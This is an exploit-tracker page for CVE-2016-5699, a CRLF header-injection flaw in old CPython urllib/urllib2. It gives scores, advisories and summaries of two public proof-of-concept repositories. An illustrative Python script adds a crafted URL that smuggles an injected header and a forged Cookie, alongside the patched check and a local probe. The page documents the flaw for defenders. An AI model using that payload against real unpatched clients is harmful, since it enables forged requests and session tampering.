CVE-2016-5699

MEDIUM

CPython < 2.7.10 and 3.x < 3.4.4 - HTTP Header Injection via CRLF Sequences in HTTPConnection.putheader

Title source: manual

Exploitation Summary

EIP tracks 2 public exploits for CVE-2016-5699. PoCs published by bunseokbot and shajinzheng.

AI-analyzed exploit summary: Both PoCs drive an unpatched urllib2/urllib client at a URL that contains percent-encoded CRLF sequences (%0d%0a). The client decodes them before HTTPConnection.putheader writes the header, and the pre-fix putheader performed no control-character check, so the attacker's text is sent as additional header lines. bunseokbot's repository pairs the sending script (`poc.py`) with a Flask-based receiver (`receiver.py`) that prints the headers it receives, making the injected lines directly observable.

Description

CRLF injection vulnerability in the HTTPConnection.putheader function in urllib2 and urllib in CPython (aka Python) before 2.7.10 and 3.x before 3.4.4 allows remote attackers to inject arbitrary HTTP headers via CRLF sequences in a URL.
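As an added illustration that is not part of this page or of either PoC repository: the Python 3 block below reproduces the two halves of the bug the description and both exploit summaries refer to. `host_as_urllib2_decoded_it` applies the percent-decoding that `urllib2.Request.get_host()` performed on the host part of a URL, `putheader_unpatched` formats a header line the way the pre-fix httplib did (no validation), `putheader_patched` applies the control-character check the fix for bpo-22928 added (the regular expression is the one CPython uses), and `interpreter_is_vulnerable` probes the running interpreter offline, since `putrequest()`/`putheader()` only buffer and never connect. The attack URL, the host 127.0.0.1, the injected header names and the toy server-side header parser are constructed for this example.

```python
import re
import http.client
from urllib.parse import unquote, urlsplit

# The check the fix (bpo-22928) added to httplib.putheader / http.client.putheader:
# a CR or LF inside a header value is only legal as line folding, i.e. LF followed
# by SP/HT, or CR followed by SP/HT/LF.
_ILLEGAL_HEADER_VALUE = re.compile(rb"\n(?![ \t])|\r(?![ \t\n])")

# Constructed attacker-influenced URL (example data, not from any real target).
# The %0d%0a sequences sit in the host component; the trailing "X-Leftover:"
# header swallows the ":8080" port suffix so the injected lines stay well-formed.
ATTACK_URL = ("http://127.0.0.1%0d%0aX-Injected:%20yes"
              "%0d%0aCookie:%20session=attacker%0d%0aX-Leftover:%20:8080/index.html")


def host_as_urllib2_decoded_it(url):
    """urllib2.Request.get_host() percent-decoded the netloc, so %0d%0a in the
    URL became a literal CRLF inside the value later passed to putheader()."""
    return unquote(urlsplit(url).netloc)


def putheader_unpatched(header, value):
    """Pre-fix putheader: format 'Name: value' with no validation at all."""
    return ("%s: %s" % (header, value)).encode("latin-1")


def putheader_patched(header, value):
    """Post-fix putheader: refuse a bare CR/LF in the value with ValueError."""
    encoded = value.encode("latin-1")
    if _ILLEGAL_HEADER_VALUE.search(encoded):
        raise ValueError("Invalid header value %r" % (encoded,))
    return header.encode("ascii") + b": " + encoded


def build_request(url, putheader):
    """Raw request bytes a urllib2-style client would put on the wire, using
    either the unpatched or the patched putheader implementation."""
    parts = urlsplit(url)
    path = parts.path or "/"
    lines = [("GET %s HTTP/1.1" % path).encode("ascii"),
             putheader("Host", host_as_urllib2_decoded_it(url)),
             putheader("User-Agent", "Python-urllib/2.7")]
    return b"\r\n".join(lines) + b"\r\n\r\n"


def headers_as_server_parses_them(raw_request):
    """Toy server-side view: CRLF-separated header lines, name before the first
    colon. Returns {name: value}; injected lines show up as ordinary headers."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, _, value = line.partition(b":")
        headers[name.decode("latin-1").strip()] = value.decode("latin-1").strip()
    return headers


def patched_rejects(url):
    """True when the patched putheader refuses the Host value derived from url."""
    try:
        build_request(url, putheader_patched)
    except ValueError:
        return True
    return False


def interpreter_is_vulnerable():
    """Probe the running interpreter without network I/O: putrequest() and
    putheader() only append to an internal buffer, and a fixed http.client
    raises ValueError on the CRLF in the header value."""
    conn = http.client.HTTPConnection("127.0.0.1")
    try:
        conn.putrequest("GET", "/", skip_host=True)
        conn.putheader("Host", "127.0.0.1\r\nX-Injected: yes")
    except ValueError:
        return False
    finally:
        conn.close()
    return True


if __name__ == "__main__":
    seen = headers_as_server_parses_them(build_request(ATTACK_URL, putheader_unpatched))
    print("unpatched client sends:", seen)
    print("patched client rejects the URL:", patched_rejects(ATTACK_URL))
    print("this interpreter is vulnerable:", interpreter_is_vulnerable())
```

Running the script on a current interpreter prints the Host value split into `Host`, `X-Injected`, `Cookie` and `X-Leftover` headers as the server would see them from an unpatched client, `True` for the patched rejection, and `False` for the interpreter probe; on CPython older than 2.7.10 or 3.4.4 the equivalent `putheader` call goes through and the probe returns `True`.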

Exploits (2)

nomisec WORKING POC 4 stars
by bunseokbot · poc
https://github.com/bunseokbot/CVE-2016-5699-poc

This repository contains a functional PoC for CVE-2016-5699, demonstrating HTTP header injection via a Python script (`poc.py`) that sends requests to a Flask-based receiver (`receiver.py`) to display headers. The exploit leverages improper handling of HTTP headers to inject malicious content.

Classification
Working Poc 90%
Attack Type
Other
Complexity
Trivial
Reliability
Reliable
Target: any HTTP server contacted by a Python urllib/urllib2 client (CPython < 2.7.10, 3.x < 3.4.4) that fetches an attacker-influenced URL; the injected headers are interpreted by that server or by proxies in front of it
No auth needed
Prerequisites: An unpatched interpreter fetching a URL the attacker can influence · Network path from the client to the server that receives the injected headers
devstral-2 · analyzed Feb 18, 2026
nomisec WORKING POC
by shajinzheng · poc
https://github.com/shajinzheng/cve-2016-5699-jinzheng-sha

This repository contains a functional PoC for CVE-2016-5699, an HTTP header injection vulnerability in Python's urllib2 library. The exploit demonstrates how crafted URLs with CRLF sequences can inject arbitrary headers into HTTP requests.

Classification
Working Poc 95%
Attack Type
Info Leak
Complexity
Trivial
Reliability
Reliable
Target: Python urllib2/urllib clients (CPython before 2.7.10; 3.x before 3.4.4)
No auth needed
Prerequisites: Python environment with vulnerable urllib2 version · Network access to target server
devstral-2 · analyzed Feb 18, 2026

References (19)

Various Sources (confirm): http://www.splunk.com/view/SP-CAAAPUE
Vendor Advisory (Red Hat): http://rhn.redhat.com/errata/RHSA-2016-1630.html
Vendor Advisory (Red Hat): http://rhn.redhat.com/errata/RHSA-2016-1627.html
Vendor Advisory (Red Hat): http://rhn.redhat.com/errata/RHSA-2016-1629.html
Various Sources (confirm): http://www.splunk.com/view/SP-CAAAPSV
Mailing List (oss-security): http://www.openwall.com/lists/oss-security/2016/06/16/2
Mailing List (debian-lts-announce): https://lists.debian.org/debian-lts-announce/2019/02/msg00011.html
Mailing List (oss-security): http://www.openwall.com/lists/oss-security/2016/06/15/12
Mailing List (oss-security): http://www.openwall.com/lists/oss-security/2016/06/14/7
Third Party Advisory / VDB Entry (SecurityFocus BID): http://www.securityfocus.com/bid/91226
Vendor Advisory (Red Hat): http://rhn.redhat.com/errata/RHSA-2016-1628.html
Vendor Advisory (Red Hat): http://rhn.redhat.com/errata/RHSA-2016-1626.html

Scores

CVSS v3 6.1
EPSS 0.0989
EPSS Percentile 94.9%
Attack Vector NETWORK
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

CWE
CWE-113
Status published
Products (27)
python/python 3.0
python/python 3.0.1
python/python 3.1.0
python/python 3.1.1
python/python 3.1.2
python/python 3.1.3
python/python 3.1.4
python/python 3.1.5
python/python 3.2.0
python/python 3.2.1
... and 17 more
Published Sep 02, 2016
Tracked Since Feb 18, 2026